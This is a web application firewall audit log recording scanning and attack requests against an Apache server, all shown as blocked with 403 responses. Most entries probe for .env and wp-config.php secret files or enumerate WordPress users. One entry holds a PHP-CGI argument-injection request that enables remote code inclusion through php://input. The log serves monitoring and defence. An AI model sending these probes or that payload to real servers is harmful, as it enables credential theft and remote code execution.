Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--15ea0040-Z--
--671ab07b-A--
[20/Apr/2025:20:35:32 +0700] aAT4JFu16wJWB6g0mU8TgwAAABQ 103.236.140.4 57628 103.236.140.4 8181
--671ab07b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.70.87
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.70.87
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept-Charset: utf-8
--671ab07b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--671ab07b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745156132216221 783 (- - -)
Stopwatch2: 1745156132216221 783; combined=331, p1=295, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--671ab07b-Z--
--93057804-A--
[20/Apr/2025:20:40:00 +0700] aAT5MEAzeWrUIk0gvAswwAAAAMo 103.236.140.4 58668 103.236.140.4 8181
--93057804-B--
GET /wp-json/wp/v2/users HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 103.253.24.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 103.253.24.90
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
--93057804-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--93057804-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745156400673119 4510 (- - -)
Stopwatch2: 1745156400673119 4510; combined=2177, p1=720, p2=1424, p3=0, p4=0, p5=33, sr=84, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--93057804-Z--
--7906e57e-A--
[20/Apr/2025:20:44:03 +0700] aAT6I1u16wJWB6g0mU8UNgAAAAc 103.236.140.4 60438 103.236.140.4 8181
--7906e57e-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 64.226.78.121
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 64.226.78.121
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--7906e57e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7906e57e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745156643493209 840 (- - -)
Stopwatch2: 1745156643493209 840; combined=312, p1=277, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7906e57e-Z--
--7da57112-A--
[20/Apr/2025:21:00:22 +0700] aAT99kAzeWrUIk0gvAsynAAAAMA 103.236.140.4 36666 103.236.140.4 8181
--7da57112-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; SM-A705GM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36
Accept-Charset: utf-8
--7da57112-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7da57112-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745157622877618 731 (- - -)
Stopwatch2: 1745157622877618 731; combined=301, p1=265, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7da57112-Z--
--9d57f26a-A--
[20/Apr/2025:21:07:02 +0700] aAT_hkAzeWrUIk0gvAszBQAAAMY 103.236.140.4 38230 103.236.140.4 8181
--9d57f26a-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 209.38.248.17
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 209.38.248.17
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--9d57f26a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9d57f26a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745158022417490 876 (- - -)
Stopwatch2: 1745158022417490 876; combined=345, p1=295, p2=0, p3=0, p4=0, p5=50, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9d57f26a-Z--
--d2bf5f4d-A--
[20/Apr/2025:22:06:22 +0700] aAUNbkAzeWrUIk0gvAs17QAAAMg 103.236.140.4 51878 103.236.140.4 8181
--d2bf5f4d-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--d2bf5f4d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d2bf5f4d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745161582487614 886 (- - -)
Stopwatch2: 1745161582487614 886; combined=360, p1=324, p2=0, p3=0, p4=0, p5=36, sr=128, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d2bf5f4d-Z--
--4ed7127e-A--
[20/Apr/2025:22:06:24 +0700] aAUNcEAzeWrUIk0gvAs17wAAAM4 103.236.140.4 51888 103.236.140.4 8181
--4ed7127e-B--
GET /api/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--4ed7127e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4ed7127e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745161584025889 874 (- - -)
Stopwatch2: 1745161584025889 874; combined=339, p1=279, p2=0, p3=0, p4=0, p5=60, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4ed7127e-Z--
--319ff07e-A--
[20/Apr/2025:22:06:25 +0700] aAUNcUAzeWrUIk0gvAs18QAAAM0 103.236.140.4 51894 103.236.140.4 8181
--319ff07e-B--
GET /.env.save HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--319ff07e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--319ff07e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745161585510354 787 (- - -)
Stopwatch2: 1745161585510354 787; combined=302, p1=267, p2=0, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--319ff07e-Z--
--b457d452-A--
[20/Apr/2025:22:06:27 +0700] aAUNc8TCDeBrh52UaHTIGgAAAIs 103.236.140.4 51900 103.236.140.4 8181
--b457d452-B--
GET /.env.prod HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--b457d452-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b457d452-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745161587045481 1002 (- - -)
Stopwatch2: 1745161587045481 1002; combined=330, p1=296, p2=0, p3=0, p4=0, p5=34, sr=110, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b457d452-Z--
--c5446600-A--
[20/Apr/2025:22:06:38 +0700] aAUNflTf0pL9EQC7JDUjbQAAAEA 103.236.140.4 51962 103.236.140.4 8181
--c5446600-B--
GET /dev/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--c5446600-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c5446600-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745161598583928 759 (- - -)
Stopwatch2: 1745161598583928 759; combined=300, p1=266, p2=0, p3=0, p4=0, p5=34, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c5446600-Z--
--87f12f5b-A--
[20/Apr/2025:22:06:39 +0700] aAUNf1Tf0pL9EQC7JDUjbgAAAFQ 103.236.140.4 51968 103.236.140.4 8181
--87f12f5b-B--
GET /application/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--87f12f5b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--87f12f5b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745161599936861 730 (- - -)
Stopwatch2: 1745161599936861 730; combined=288, p1=257, p2=0, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--87f12f5b-Z--
--cec26969-A--
[20/Apr/2025:22:18:09 +0700] aAUQMVTf0pL9EQC7JDUkCQAAAE0 103.236.140.4 54634 103.236.140.4 8181
--cec26969-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 165.22.235.3
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 165.22.235.3
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--cec26969-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cec26969-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745162289001344 653 (- - -)
Stopwatch2: 1745162289001344 653; combined=239, p1=216, p2=0, p3=0, p4=0, p5=23, sr=53, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cec26969-Z--
--145c9b21-A--
[20/Apr/2025:22:27:56 +0700] aAUSfFu16wJWB6g0mU8cmwAAABY 103.236.140.4 57492 103.236.140.4 8181
--145c9b21-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--145c9b21-C--
--145c9b21-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--145c9b21-E--
--145c9b21-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745162876011773 4525 (- - -)
Stopwatch2: 1745162876011773 4525; combined=3029, p1=545, p2=2454, p3=0, p4=0, p5=30, sr=124, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--145c9b21-Z--
--8ee4ea3e-A--
[20/Apr/2025:23:02:08 +0700] aAUagEAzeWrUIk0gvAs5fQAAANg 103.236.140.4 37292 103.236.140.4 8181
--8ee4ea3e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.72.141
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.72.141
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36 Vivaldi/2.6.1566.49
Accept-Charset: utf-8
--8ee4ea3e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8ee4ea3e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745164928525785 802 (- - -)
Stopwatch2: 1745164928525785 802; combined=341, p1=305, p2=0, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8ee4ea3e-Z--
--c430c87e-A--
[20/Apr/2025:23:55:06 +0700] aAUm6lTf0pL9EQC7JDUqeAAAAFA 103.236.140.4 49722 103.236.140.4 8181
--c430c87e-B--
GET /.well-known/pki-validation/wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 52.230.121.51
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 52.230.121.51
X-Forwarded-Proto: http
Connection: close
--c430c87e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c430c87e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745168106815164 800 (- - -)
Stopwatch2: 1745168106815164 800; combined=267, p1=228, p2=0, p3=0, p4=0, p5=38, sr=69, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c430c87e-Z--
--69e4fc15-A--
[21/Apr/2025:00:17:44 +0700] aAUsOMTCDeBrh52UaHTO6QAAAJI 103.236.140.4 55588 103.236.140.4 8181
--69e4fc15-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 188.166.108.93
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 188.166.108.93
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--69e4fc15-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--69e4fc15-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745169464654402 1093 (- - -)
Stopwatch2: 1745169464654402 1093; combined=457, p1=417, p2=0, p3=0, p4=0, p5=40, sr=85, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--69e4fc15-Z--
--4531b50f-A--
[21/Apr/2025:01:31:48 +0700] aAU9lEAzeWrUIk0gvAtlPAAAANI 103.236.140.4 56458 103.236.140.4 8181
--4531b50f-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 157.245.113.227
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 157.245.113.227
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--4531b50f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4531b50f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745173908161929 864 (- - -)
Stopwatch2: 1745173908161929 864; combined=382, p1=348, p2=0, p3=0, p4=0, p5=33, sr=146, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4531b50f-Z--
--1c459339-A--
[21/Apr/2025:02:03:37 +0700] aAVFCcTCDeBrh52UaHQKjAAAAI0 103.236.140.4 41088 103.236.140.4 8181
--1c459339-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.72.141
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.72.141
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.1
Accept-Charset: utf-8
--1c459339-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1c459339-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745175817448557 908 (- - -)
Stopwatch2: 1745175817448557 908; combined=368, p1=328, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1c459339-Z--
--9d850c09-A--
[21/Apr/2025:03:27:57 +0700] aAVYzUAzeWrUIk0gvAuEmwAAAMk 103.236.140.4 40530 103.236.140.4 8181
--9d850c09-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.232.49.169
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.232.49.169
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--9d850c09-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9d850c09-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745180877249407 782 (- - -)
Stopwatch2: 1745180877249407 782; combined=310, p1=275, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9d850c09-Z--
--a45fe228-A--
